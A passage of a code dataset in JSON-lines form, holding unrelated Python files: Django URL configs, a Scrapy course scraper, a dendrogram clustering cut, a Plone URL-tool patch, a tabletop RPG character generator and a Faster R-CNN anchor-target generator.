createuser():\r\n \"\"\"\r\n Saves information from user input as dictionary as json file.\r\n \"\"\"\r\n name, phone, city = userinfo()\r\n profile = {'name' : name,\r\n 'phone' : phone,\r\n 'city' : city\r\n }\r\n with open('userprofile.json', 'a') as f:\r\n json.dump(profile, f)\r\n\r\ndef userinfo():\r\n \"\"\"\r\n Record user inputted information.\r\n \"\"\"\r\n name = input('Enter name: ')\r\n phone = int(input('Enter phone number: '))\r\n city = input('Enter city: ')\r\n return name, phone, city\r\n\r\nif __name__ == '__main__':\r\n createuser()\r\n","sub_path":"Weather API SMS/saveuser.py","file_name":"saveuser.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"148505795","text":"\"\"\"mozio URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom tastypie.api import Api\n\nfrom provider.api.resources import ProviderResource\nfrom servicearea.api.resources import ServiceAreaResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(ProviderResource())\nv1_api.register(ServiceAreaResource())\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include(v1_api.urls)),\n url(r'^api/doc',\n include('tastypie_swagger.urls', namespace='mozioapi_tastypie_swagger'),\n kwargs={\n 'tastypie_api_module': v1_api,\n 'namespace': 'mozioapi_tastypie_swagger',\n 'version': '1.0'\n }\n ),\n]\n","sub_path":"mozio/mozio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222191941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on June 2019\n@author: Thomas Bonald \n@author: Bertrand Charpentier \n@author: Quentin Lutz \n\"\"\"\n\nimport numpy as np\n\n\ndef straight_cut(dendrogram: np.ndarray, n_clusters: int = 2, sorted_clusters: bool = True) -> np.ndarray:\n \"\"\"\n Extract the clustering with given number of clusters from the dendrogram.\n\n Parameters\n ----------\n dendrogram:\n Dendrogram\n n_clusters :\n Number of cluster.\n sorted_clusters :\n If True, sort labels in decreasing order of cluster size.\n\n Returns\n -------\n labels : np.ndarray\n Cluster index of each node.\n \"\"\"\n n_nodes = dendrogram.shape[0] + 1\n if n_clusters < 1 or n_clusters > n_nodes:\n raise ValueError(\"The number of clusters must be between 1 and the number of nodes.\")\n\n labels = np.zeros(n_nodes, dtype=int)\n cluster = {node: [node] for node in range(n_nodes)}\n for t in range(n_nodes - n_clusters):\n cluster[n_nodes + t] = cluster.pop(int(dendrogram[t][0])) + \\\n cluster.pop(int(dendrogram[t][1]))\n\n clusters = list(cluster.values())\n if sorted_clusters:\n clusters = sorted(clusters, key=len, reverse=True)\n for label, index in enumerate(clusters):\n labels[index] = label\n return labels\n","sub_path":"sknetwork/hierarchy/cuts.py","file_name":"cuts.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"599099384","text":"import scrapy\nfrom ..items import Course\n\n\nclass UoGSpider(scrapy.Spider):\n name = 'uog_courses'\n allowed_domains = ['www.gla.ac.uk']\n start_urls = ['http://www.gla.ac.uk/coursecatalogue/browsebysubjectarea/']\n scheme_url = 'http://www.gla.ac.uk'\n\n def parse(self, response):\n for a_element in response.xpath(\"//div[@class='maincontent fullwidth']/ul/li/a\"):\n # get the school title and url to follow\n subject_title = a_element.xpath(\"text()\").extract()[0]\n url = a_element.xpath(\"@href\").extract()[0]\n # create request\n request = scrapy.Request(self.scheme_url + url, callback=self.parse_subject_courses)\n # add this school object and pass it down the chain of processing\n request.meta['subject'] = subject_title.strip()\n yield request\n\n def parse_subject_courses(self, response):\n for a_element in response.xpath(\"//div[@class='maincontent fullwidth']/form[@id='printForm']/div/ul/li/a\"):\n # get the course title and url to follow\n course_title = a_element.xpath(\"text()\").extract()[0]\n url = a_element.xpath(\"@href\").extract()[0]\n # create course object\n this_course = Course()\n this_course['label'] = course_title.strip().title()\n this_course['subject'] = response.meta['subject']\n this_course['url'] = \"%s%s\" % (self.scheme_url, url)\n # create request\n request = scrapy.Request(self.scheme_url + url, callback=self.parse_course)\n # add this course object and pass it down the chain of processing\n request.meta['course'] = this_course\n yield request\n\n def parse_course(self, response):\n course = response.meta['course']\n desc = ''.join(response.xpath(\"//div[@class='maincontent fullwidth']/div[2]/p[1]/descendant::*/text()\").extract())\n school = response.xpath(\"//div[@class='maincontent fullwidth']/ul/li[2]/text()\").extract()[0]\n level = response.xpath(\"//div[@class='maincontent fullwidth']/ul/li[4]/text()\").extract()[0]\n course['school'] = school\n course['description'] = 'Course at the University of Glasgow'\n course['short_description'] = desc\n course['level'] = level\n return course","sub_path":"collections_manager/factories/uog_courses/scrapers/uog_courses_scraper/spiders/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440506547","text":"from cs50 import get_string, get_int\n\ndef main():\n # Prompt and validate user input\n while True:\n height = get_int(\"Height: \")\n if (height > 0 and height <= 8):\n break\n \n # Draw the half pyramid\n for line in range(height):\n space = height - line\n while (space > 1):\n print(\" \", end=\"\")\n space -= 1\n for hash in range(line + 1):\n print(\"#\", end=\"\")\n print() \n\nif __name__ == \"__main__\":\n main() \n","sub_path":"Problem Set 6/Mario/mario_less.py","file_name":"mario_less.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409287130","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('library', '0005_auto_20160204_1250'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='book',\n old_name='no_of_times_issued',\n new_name='total_no_of_times_issued',\n ),\n ]\n","sub_path":"gbpeclibrary/library/migrations/0006_auto_20160204_1254.py","file_name":"0006_auto_20160204_1254.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267920653","text":"from Products.CMFPlone.URLTool import URLTool\n\nfrom adapters.interfaces import IRequestPortalUrlAnnotator\n\n## XXX PATCH FOR FILERESOURCE, UNTILL ADD 'POST' METHOD OR FIX \n## ResourceRegistries.tools.BaseRegistry.BaseRegistryTool.getResourceContent method\nmarker = []\nfrom Products.Five.browser.resource import FileResource\n\nif getattr(FileResource, 'POST', marker) == marker:\n FileResource.POST = FileResource.GET\n\ndef urltool_call(self, relative=0, *args, **kw):\n \"\"\" Get by default the absolute URL of the portal. If request is annonated then add suffix to portal_url\n \"\"\"\n # print '################################ Called patched portal_url __call__: ' + self.REQUEST.URL\n url_suffix = ''\n if self.REQUEST:\n annotator = IRequestPortalUrlAnnotator(self.REQUEST, None)\n if annotator is not None:\n url_suffix = annotator.getPortalUrlSuffix(default=marker)\n if not url_suffix == marker:\n return url_suffix\n return self.getPortalObject().absolute_url(relative=relative)\n\ndef urltool_getPortalPath(self):\n \"\"\" Get the portal object's URL without the server URL component.\n \"\"\"\n\n url_suffix = ''\n if self.REQUEST:\n annotator = IRequestPortalUrlAnnotator(self.REQUEST, None)\n if annotator is not None:\n url_suffix = annotator.getPortalUrlSuffix()\n # print '############ Added sufix to portal_url: ' + url_suffix\n\n return '/'.join(self.getPortalObject().getPhysicalPath()) + url_suffix\n\nURLTool.__call__ = urltool_call\n#URLTool.getPortalPath = urltool_getPortalPath\n","sub_path":"qLocalSkin/trunk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"471389206","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'mugsandcups'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^catalog/$', views.catalog, name='catalog'),\n url(r'^about/$', views.about, name='about'),\n url(r'^contact/$', views.contact, name='contact'),\n\n]","sub_path":"mugsandcups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269187781","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport abc\nimport os\nimport typing\n\n\nclass EnvironmentVariableMixin(metaclass=abc.ABCMeta):\n def set_environment_variable(self, name: str, value: str) -> None:\n self.__add_cleanup_for_environment_variable(name)\n os.environ[name] = value\n\n def unset_environment_variable(self, name: str) -> None:\n self.__add_cleanup_for_environment_variable(name)\n del os.environ[name]\n\n def __add_cleanup_for_environment_variable(self, name: str) -> None:\n old_value = os.getenv(name)\n\n def restore() -> None:\n if old_value is None:\n del os.environ[name]\n else:\n os.environ[name] = old_value\n\n self.addCleanup(restore)\n\n def addCleanup(\n self,\n function: typing.Callable[..., typing.Any],\n *args: typing.Any,\n **kwargs: typing.Any\n ) -> None:\n raise NotImplementedError()\n","sub_path":"eden/integration/lib/environment_variable.py","file_name":"environment_variable.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"414030478","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nstores classes with logic for display of traits and using points\n\"\"\"\n\nimport random\nfrom .randweight import randweight\nimport app.traits as traits\nimport app.weights as weightsmodule\nfrom .avrunda import avrunda\nimport importlib\nfrom app import db, models\nfrom .hedtypes import agecats, age_mods\n\nclass Npc:\n def trace(self, trait, change):\n if trait in self.trace_buys.keys():\n self.trace_buys[trait] += change\n else:\n self.trace_buys[trait] = change\n\n def use_points(self, trait):\n if self.points_left >= traits.costs[trait]:\n if trait in traits.doubles:\n for i in traits.doubles[trait]:\n self.traits[i] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':trait,\n 'cost':traits.costs[trait],\n 'points left':self.points_left})\n #self.trace(trait, 1) # trace buys\n elif trait in ['Bas', 'Skol', 'Yrke']:\n self.traits[trait] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':trait,\n 'cost':traits.costs[trait],\n 'points left':self.points_left})\n #self.trace(trait, 1)\n if trait == 'Skol':\n if self.traits[trait] % 3 == 0:\n if self.points_left >= traits.costs['Special_skol']:\n self.traits['Special_skol'] += 1\n self.points_left -= traits.costs['Special_skol']\n self.trace_buys.append({'trait':'Special_skol',\n 'cost':traits.costs['Special_skol'],\n 'points left':self.points_left})\n #self.trace('Special_skol', 1)\n else: pass\n else: pass\n elif trait == 'Yrke':\n if self.traits[trait] % 3 == 0:\n if self.points_left >= traits.costs['Special_yrke']:\n self.traits['Special_yrke'] += 1\n self.points_left -= traits.costs['Special_yrke']\n self.trace_buys.append({'trait':'Special_yrke',\n 'cost':traits.costs['Special_yrke'],\n 'points left':self.points_left})\n #self.trace('Special_yrke', 1)\n else: pass\n else: pass\n elif trait == 'Special_hobb':\n self.traits[trait] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':'Special_hobb',\n 'cost':traits.costs['Special_hobb'],\n 'points left':self.points_left})\n #self.trace(trait, 1)\n else: pass\n else: pass\n\n \n \n def dist_points(self):\n path = self.weights\n while self.points_left > 1:\n mainweights = {key:path[key]['main'] for key in path.keys()}\n main = randweight(mainweights)\n if sum(path[main]['sub'].values()) != 0:\n subweights = path[main]['sub']\n sub = randweight(subweights)\n self.use_points(sub)\n if self.points_left == 1 and self.weights['Färdigheter']['sub']['Special_hobb'] != 0:\n self.use_points('Special_hobb')\n\n def move_sliders(self):\n for i in ['fys_ment','konst_rörl','snabb_uth','finm_grovm','perc_konc',\n 'prak_teor','log_emo']:\n n = randweight({0:25, 1:20, 2:5, 3:1})\n for t in traits.sliders[i]:\n if n >= self.traits[t]:\n n = self.traits[t] - 1\n if n != 0:\n if i == 'fys_ment':\n plus = randweight(weightsmodule.fys_ment[self.start_values['Yrke']])\n fys_mod = 1 if plus == 'Fysisk' else -1\n ment_mod = fys_mod * -1\n while n > 0:\n change_fys = random.choice(['konst_rörl','snabb_uth','finm_grovm'])\n for i in traits.doubles[change_fys]:\n self.traits[i] += (1 * fys_mod)\n change_ment = random.choice(['perc_konc','prak_teor','log_emo'])\n for i in traits.doubles[change_ment]:\n self.traits[i] += (1 * ment_mod)\n self.trace_buys.append({'fys_ment':{change_fys:(fys_mod),\n change_ment:(ment_mod)}})\n n -= 1\n else:\n direction = random.choice(['höger', 'vänster'])\n if direction == 'höger':\n self.traits[traits.doubles[i][0]] += n \n self.traits[traits.doubles[i][1]] -= n\n else:\n self.traits[traits.doubles[i][0]] -= n\n self.traits[traits.doubles[i][1]] += n\n self.trace_buys.append({'slider':i,\n 'direction':direction,\n 'n':n})\n else: pass\n\n for i in traits.senses:\n n = randweight({0:240, 1:20, 2:5, 3:1})\n sign = random.choice([1, -1])\n self.traits[i] += (n * sign)\n self.points_left += (n * sign * -1 * traits.costs[i])\n if n != 0:\n self.trace_buys.append({'slider':i,\n 'n':(n*sign),\n 'points_left':self.points_left})\n \n \n\n def level_specials(self, n):\n specs = ['Special_skol', 'Special_yrke']\n if self.weights['Färdigheter']['sub']['Special_hobb'] != 0:\n specs.append['Special_hobb']\n for i in range(n):\n trait = random.choice(specs)\n self.traits[trait] += 1\n self.trace_buys.append('level special: %s' % trait)\n \n\n def calc_skills(self):\n skills = {}\n for i in traits.skills_bases.keys():\n x = traits.skills_bases[i][0]\n y = traits.skills_bases[i][1]\n skills[i] = self.traits[x] + self.traits[y]\n return skills\n\n def calc_hitpoints(self):\n hp = {}\n k = self.traits['Konstitution'] - 1\n hp['Huvud'] = int(2 + k/2)\n for i in ['Hals', 'Vänster fot', 'Höger fot']:\n hp[i] = int(1 + k/3)\n for i in ['Vänster axel', 'Höger axel']:\n hp[i] = int(4 + k/2)\n hp['Bröstkorg'] = int(4.5 + k/2)\n for i in ['Vänster överarm', 'Höger överarm']:\n hp[i] = int(2.5 + k/2)\n for i in ['Mage', 'Vänster lår', 'Höger lår']:\n hp[i] = int(3 + k/3)\n for i in ['Vänster underarm', 'Höger underarm']:\n hp[i] = int(1.5 + k/2)\n for i in ['Vänster hand', 'Höger hand']:\n hp[i] = int(1 + k/5)\n hp['Höft'] = int(4 + k/3)\n for i in ['Vänster smalben', 'Höger smalben']:\n hp[i] = int(2 + k/3)\n return hp\n\n def calc_iv(self):\n base = self.traits['Snabbhet']\n if base == 1:\n iv = 24\n elif base == 2:\n iv = 27\n elif base > 5:\n iv = 30 + (base - 5) * 3\n else:\n iv = 30\n for i in ['Perception', 'Koncentration', 'Praktisk', 'Emotionell']:\n iv += self.traits[i]\n return iv\n\n def calc_move_carry(self):\n res = {}\n res['Normal förflyttning'] = self.start_values['Längd'] * 0.65 / 100\n s, u = self.traits['Snabbhet'], self.traits['Rörlighet']\n res['Sprint'] = (s + u) / 2 * res['Normal förflyttning']\n res['Jogg'] = res['Sprint'] / 2\n res['Normal / 8 h'] = res['Normal förflyttning'] * 3600 * 8 / 1000\n res['Maximal förflyttning'] = self.traits['Uthållighet'] * 5 / 2 * 10\n res['Normal bärförmåga'] = self.traits['Konstitution'] + self.traits['Uthållighet']\n res['Maximal bärförmåga'] = res['Normal bärförmåga'] * 15\n return res\n ##### Must use string formatting to display correct decimals #####\n\n def round_move_carry(self):\n res = {}\n for i in self.move_carry['exakt']:\n res[i] = avrunda(i, self.move_carry['exakt'][i])\n return res\n \n\n def __init__(self, start_values, weights, char_traits, points):\n self.trace_buys = [('create char',points)] # to trace what's been bought\n self.start_values = start_values\n self.weights = weights\n self.traits = char_traits\n self.points_left = points\n self.move_sliders()\n self.dist_points()\n self.level_specials(self.start_values['Nivå'] - 1)\n self.skills = self.calc_skills()\n self.hitpoints = self.calc_hitpoints()\n self.traits['Total IV'] = self.calc_iv()\n self.move_carry = {'exakt': {}, 'avrundat': {}}\n self.move_carry['exakt'] = self.calc_move_carry()\n self.move_carry['avrundat'] = self.round_move_carry()\n\n def toDict(self):\n return {'trace_buys':str(self.trace_buys),\n 'start_values':self.start_values,\n 'weights':self.weights,\n 'traits':self.traits,\n 'points_left':self.points_left,\n 'skills':self.skills,\n 'hitpoints':self.hitpoints,\n 'move_carry':self.move_carry,\n 'name':'',\n 'campaign':'',\n 'notes':''}\n \n\n def ding(self, lvls, years):\n self.trace_buys.append('DING: %s levels, %s years' % (lvls, years))\n oldlvl = self.start_values['Nivå']\n newlvl = oldlvl + int(lvls)\n oldage = self.start_values['Ålder']\n newage = oldage + int(years)\n points = 0\n if newage != oldage:\n old_age_points = int(avrunda(None, oldage/4))\n new_age_points = int(avrunda(None, newage/4))\n points += (new_age_points - old_age_points)\n self.start_values['Ålder'] = newage\n oldagecat = self.start_values['Ålderskategori']\n cats = dict(agecats[self.start_values['Ras']])\n if newage <= cats['Ung']:\n newagecat = 'Ung'\n elif newage <= cats['Mogen']:\n newagecat = 'Mogen'\n elif newage <= cats['Medel']:\n newagecat = 'Medel'\n elif newage <= cats['Gammal']:\n newagecat = 'Gammal'\n else:\n newagecat = 'Åldring'\n if newagecat != oldagecat:\n self.trace_buys.append('Ändra ålderskategori: %s => %s' % (oldagecat, newagecat))\n self.change_agecat(oldagecat, newagecat)\n self.start_values['Ålderskategori'] = newagecat\n if newlvl != oldlvl:\n points += int(lvls) * 4\n if oldlvl == 1:\n points += 2\n self.start_values['Nivå'] = newlvl\n self.points_left += points\n self.trace_buys.append('Sparade poäng: +%s' % points)\n self.dist_points()\n self.level_specials(int(lvls))\n self.skills = self.calc_skills()\n self.hitpoints = self.calc_hitpoints()\n self.traits['Total IV'] = self.calc_iv()\n self.move_carry['exakt'] = self.calc_move_carry()\n self.move_carry['avrundat'] = self.round_move_carry()\n\n def change_agecat(self, old, new):\n for i in age_mods[old]:\n self.traits[i] += (age_mods[old][i] * -1)\n self.trace_buys.append('%s: %s' % (i, age_mods[old][i]*-1))\n for i in age_mods[new]:\n self.traits[i] += age_mods[new][i]\n self.trace_buys.append('%s: %s' % (i, age_mods[new][i]))\n\n \nclass LoadNpc(Npc):\n def __init__(self, values, user):\n self.id = values['id']\n self.timestamp = values['timestamp']\n self.trace_buys = values['trace_buys']\n self.start_values = values['start_values']\n self.weights = values['weights']\n self.traits = values['traits']\n self.points_left = values['points_left']\n self.skills = values['skills']\n self.hitpoints = values['hitpoints']\n self.move_carry = values['move_carry']\n self.campaign = values['campaign']\n self.notes = values['notes']\n self.name = values['name']\n\n def toDict(self):\n d = Npc.toDict(self)\n d['name'] = self.name\n d['campaign'] = self.campaign\n d['notes'] = self.notes\n return d\n","sub_path":"app/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":13073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"25900819","text":"import random\n\nimport cv2\nimport numpy as np\n\n\n# image resize\nfrom keras.applications import imagenet_utils\nfrom .kitti_parser import KittiParser\nfrom .hyper_params import H\n\n\ndef process_image(file_path):\n x_img = cv2.imread(file_path)\n if x_img is None:\n print(\"error: reading image {} failed.\".format(file_path))\n return None, None, None, None, None\n\n h, w = x_img.shape[:2]\n resized_w, resized_h = get_new_img_size(w, h, img_min_side=H.min_img_width)\n\n # prepare X\n x_img = cv2.resize(x_img, (resized_w, resized_h))\n x_img = cv2.cvtColor(x_img, cv2.COLOR_BGR2RGB)\n x_img = np.expand_dims(x_img, axis=0)\n x_img = imagenet_utils.preprocess_input(x_img, mode='tf')\n return x_img, w, h, resized_w, resized_h\n\n\ndef gen_anchor_map(output_width, output_height, resized_width, resized_height, rpn_regr):\n \"\"\"\n calculate the anchor cx, cy, w, h\n :param output_width:\n :param output_height:\n :param resized_width:\n :param resized_height:\n :return:\n \"\"\"\n anchor_sizes = H.anchor_box_scales\n anchor_ratios = H.anchor_box_ratios\n num_anchor = H.num_anchor\n\n # store the anchor cx, cy, w, h\n M = np.zeros((4, output_height, output_width, num_anchor))\n current_layer = 0\n for idx_anchor_size, anchor_size in enumerate(anchor_sizes):\n for idx_anchor_ratio, anchor_ratio in enumerate(anchor_ratios):\n anchor_w = anchor_size * anchor_ratio[0]\n anchor_h = anchor_size * anchor_ratio[1]\n\n X, Y = np.meshgrid(np.arange(output_width), np.arange(output_height))\n M[0, :, :, current_layer] = (X + 0.5) * H.down_scale - anchor_w / 2. # xmin\n M[1, :, :, current_layer] = (Y + 0.5) * H.down_scale - anchor_h / 2. # ymin\n M[2, :, :, current_layer] = anchor_w\n M[3, :, :, current_layer] = anchor_h\n\n M[0, :, :, current_layer] = np.maximum(0, M[0, :, :, current_layer])\n M[1, :, :, current_layer] = np.maximum(0, M[1, :, :, current_layer])\n\n current_layer += 1\n # idx_anchor = idx_anchor_size * len(anchor_ratios) + idx_anchor_ratio\n #\n # for fx in range(output_width):\n # # self.down_scale * (fx + 0.5) is the center_x of the anchor box\n # anchor_xmin = H.down_scale * (fx + 0.5) - anchor_w / 2\n # anchor_xmax = H.down_scale * (fx + 0.5) + anchor_w / 2\n #\n # # anchor xmin or xmax exceeds the image\n # if anchor_xmin < 0 or anchor_xmax > resized_width:\n # continue\n # for fy in range(output_height):\n # anchor_ymin = H.down_scale * (fy + 0.5) - anchor_h / 2\n # anchor_ymax = H.down_scale * (fy + 0.5) + anchor_h / 2\n #\n # if anchor_ymin < 0 or anchor_ymax > resized_height:\n # continue\n #\n # anchor_cx = (anchor_xmin + anchor_xmax) / 2.0\n # anchor_cy = (anchor_ymin + anchor_ymax) / 2.0\n # M[0, fy, fx, start:start + 4] = [anchor_cx, anchor_cy, anchor_w, anchor_h]\n return M\n\n\ndef get_new_img_size(width, height, img_min_side):\n if width <= height:\n f = float(img_min_side) / width\n resized_height = int(f * height)\n resized_width = int(img_min_side)\n else:\n f = float(img_min_side) / height\n resized_width = int(f * width)\n resized_height = int(img_min_side)\n\n return resized_width, resized_height\n\n\n# Intersection of Union\ndef iou(a, b):\n # a and b should be (x1,y1,x2,y2)\n\n if a[0] >= a[2] or a[1] >= a[3] or b[0] >= b[2] or b[1] >= b[3]:\n return 0.0\n\n area_i = intersection(a, b)\n area_u = union(a, b, area_i)\n\n return float(area_i) / float(area_u + 1e-6)\n\n\ndef union(au, bu, area_intersection):\n area_a = (au[2] - au[0]) * (au[3] - au[1])\n area_b = (bu[2] - bu[0]) * (bu[3] - bu[1])\n area_union = area_a + area_b - area_intersection\n return area_union\n\n\ndef intersection(ai, bi):\n x = max(ai[0], bi[0])\n y = max(ai[1], bi[1])\n w = min(ai[2], bi[2]) - x\n h = min(ai[3], bi[3]) - y\n if w < 0 or h < 0:\n return 0\n return w * h\n\n\nclass TrainDataGenerator(object):\n\n def __init__(self, data_dir, annotation_format='kitti'):\n self.annotation_data = None\n if 'kitti' == annotation_format:\n annotation_parser = KittiParser(data_dir)\n self.annotation_data = annotation_parser.get_annotations()\n\n if self.annotation_data is None:\n raise ValueError('missing annotation')\n\n def get_train_datagen(self):\n while True:\n # shuffle it in every epoch\n random.shuffle(self.annotation_data)\n\n # ensure every image is used for training at least once.\n for img_data in self.annotation_data:\n file_path = img_data.get('file_path')\n\n x_img, w, h, resized_w, resized_h = process_image(file_path)\n if x_img is None:\n print(\"error: reading image {} failed.\".format(file_path))\n continue\n\n # prepare Y\n # now calculates the rpn gt cls and regression box\n y_rpn_cls, y_rpn_regr = self.calc_rpn_gt(resized_w, resized_h, w, h, img_data['bboxes'])\n\n # scaling the regression target, i don't know why TODO\n y_rpn_regr[:, y_rpn_regr.shape[1]//2:, :, :] *= H.std_scaling\n\n # change shape to NWHC format\n y_rpn_cls = np.transpose(y_rpn_cls, (0, 2, 3, 1))\n y_rpn_regr = np.transpose(y_rpn_regr, (0, 2, 3, 1))\n\n yield x_img, [y_rpn_cls, y_rpn_regr]\n\n def calc_rpn_gt(self, resized_width, resized_height, w, h, gt_bboxes,\n rpn_min_overlap=H.rpn_min_overlap, rpn_max_overlap=H.rpn_max_overlap, num_region=H.rpn_num_regions):\n anchor_sizes = H.anchor_box_scales\n anchor_ratios = H.anchor_box_ratios\n num_anchors = len(anchor_sizes) * len(anchor_ratios)\n\n output_width, output_height = int(resized_width / H.down_scale), int(resized_height / H.down_scale)\n\n num_bbox = len(gt_bboxes)\n gta = np.zeros((num_bbox, 4)) # store the gt bboxes\n for idx, bbox in enumerate(gt_bboxes):\n gta[idx, 0] = bbox['xmin'] * (resized_width / float(w))\n gta[idx, 1] = bbox['xmax'] * (resized_width / float(w))\n gta[idx, 2] = bbox['ymin'] * (resized_height / float(h))\n gta[idx, 3] = bbox['ymax'] * (resized_height / float(h))\n\n # from anchor perspective\n y_rpn_overlap = np.zeros((output_height, output_width, num_anchors)) # 记录iou?\n y_is_box_valid = np.zeros((output_height, output_width, num_anchors)) # objectness?\n y_rpn_regr = np.zeros((output_height, output_width, num_anchors * 4)) # anchor bbox\n\n # from the gt bbox perspective.\n bbox_num_pos_anchors = np.zeros(num_bbox).astype(int)\n best_anchor_for_bbox = -1 * np.ones((num_bbox, 4)).astype(int)\n best_iou_for_bbox = np.zeros(num_bbox).astype(np.float32)\n best_x_for_bbox = np.zeros((num_bbox, 4)).astype(int)\n best_dx_for_bbox = np.zeros((num_bbox, 4)).astype(np.float32)\n\n # step 1:\n # for all the feature map locations, calculates its iou with the gt boxes, and determine its training target\n # i.e. whether it should predict an object or background\n for idx_anchor_size, anchor_size in enumerate(anchor_sizes):\n for idx_anchor_ratio, anchor_ratio in enumerate(anchor_ratios):\n anchor_w = anchor_size * anchor_ratio[0]\n anchor_h = anchor_size * anchor_ratio[1]\n\n for fx in range(output_width):\n # self.down_scale * (fx + 0.5) is the center_x of the anchor box\n anchor_xmin = H.down_scale * (fx + 0.5) - anchor_w / 2\n anchor_xmax = H.down_scale * (fx + 0.5) + anchor_w / 2\n\n # anchor xmin or xmax exceeds the image\n if anchor_xmin < 0 or anchor_xmax > resized_width:\n continue\n for fy in range(output_height):\n anchor_ymin = H.down_scale * (fy + 0.5) - anchor_h / 2\n anchor_ymax = H.down_scale * (fy + 0.5) + anchor_h / 2\n\n if anchor_ymin < 0 or anchor_ymax > resized_height:\n continue\n\n # this is the best IOU for the (x,y) coord and the current anchor\n # note that this is different from the best IOU for a GT bbox\n best_iou_for_current_location = 0.0\n best_regr = [0.0] * 4\n # now we get the anchor coordinate, let's calculate the IOU\n anchor_type = 'neg'\n for idx_bbox in range(len(gt_bboxes)):\n gt_xmin, gt_xmax, gt_ymin, gt_ymax = gta[idx_bbox, 0], gta[idx_bbox, 1], gta[idx_bbox, 2], \\\n gta[idx_bbox, 3]\n\n # the iou between the current anchor and the gt box\n current_iou = iou([gt_xmin, gt_ymin, gt_xmax, gt_ymax],\n [anchor_xmin, anchor_ymin, anchor_xmax, anchor_ymax])\n\n # find a good match anchor box\n if current_iou > best_iou_for_bbox[idx_bbox] or current_iou > rpn_max_overlap:\n # calculate the deltas\n gt_cx = (gt_xmin + gt_xmax) / 2.0\n gt_cy = (gt_ymin + gt_ymax) / 2.0\n anchor_cx = (anchor_xmin + anchor_xmax) / 2.0\n anchor_cy = (anchor_ymin + anchor_ymax) / 2.0\n\n delta_cx = (gt_cx - anchor_cx) / anchor_w\n delta_cy = (gt_cy - anchor_cy) / anchor_h\n\n delta_w = np.log((gt_xmax - gt_xmin) / anchor_w)\n delta_h = np.log((gt_ymax - gt_ymin) / anchor_h)\n\n # setting the gt box related variables\n # each GT boxes should be mapped to an anchor box,\n # so we keep track of which anchor box was best\n if current_iou > best_iou_for_bbox[idx_bbox]:\n best_anchor_for_bbox[idx_bbox, :] = [fy, fx, idx_anchor_ratio, idx_anchor_size]\n best_iou_for_bbox[idx_bbox] = current_iou\n best_x_for_bbox[idx_bbox, :] = [anchor_xmin, anchor_xmax, gt_xmin, gt_xmax]\n best_dx_for_bbox[idx_bbox, :] = [delta_cx, delta_cy, delta_w, delta_h]\n\n if current_iou > rpn_max_overlap:\n bbox_num_pos_anchors[idx_bbox] += 1\n anchor_type = 'pos'\n\n if current_iou > best_iou_for_current_location:\n best_iou_for_current_location = current_iou\n best_regr = [delta_cx, delta_cy, delta_w, delta_h]\n\n if rpn_min_overlap < current_iou < rpn_max_overlap:\n # gray zone between neg and pos\n if anchor_type != 'pos':\n anchor_type = 'neutral'\n\n # now all the gt_boxes have been processed for one anchor location\n idx_anchor = idx_anchor_size * len(anchor_ratios) + idx_anchor_ratio\n if anchor_type == 'neg':\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 0\n elif anchor_type == 'neutral':\n y_is_box_valid[fy, fx, idx_anchor] = 0\n y_rpn_overlap[fy, fx, idx_anchor] = 0\n elif anchor_type == 'pos':\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 1\n start = 4 * idx_anchor\n y_rpn_regr[fy, fx, start:start + 4] = 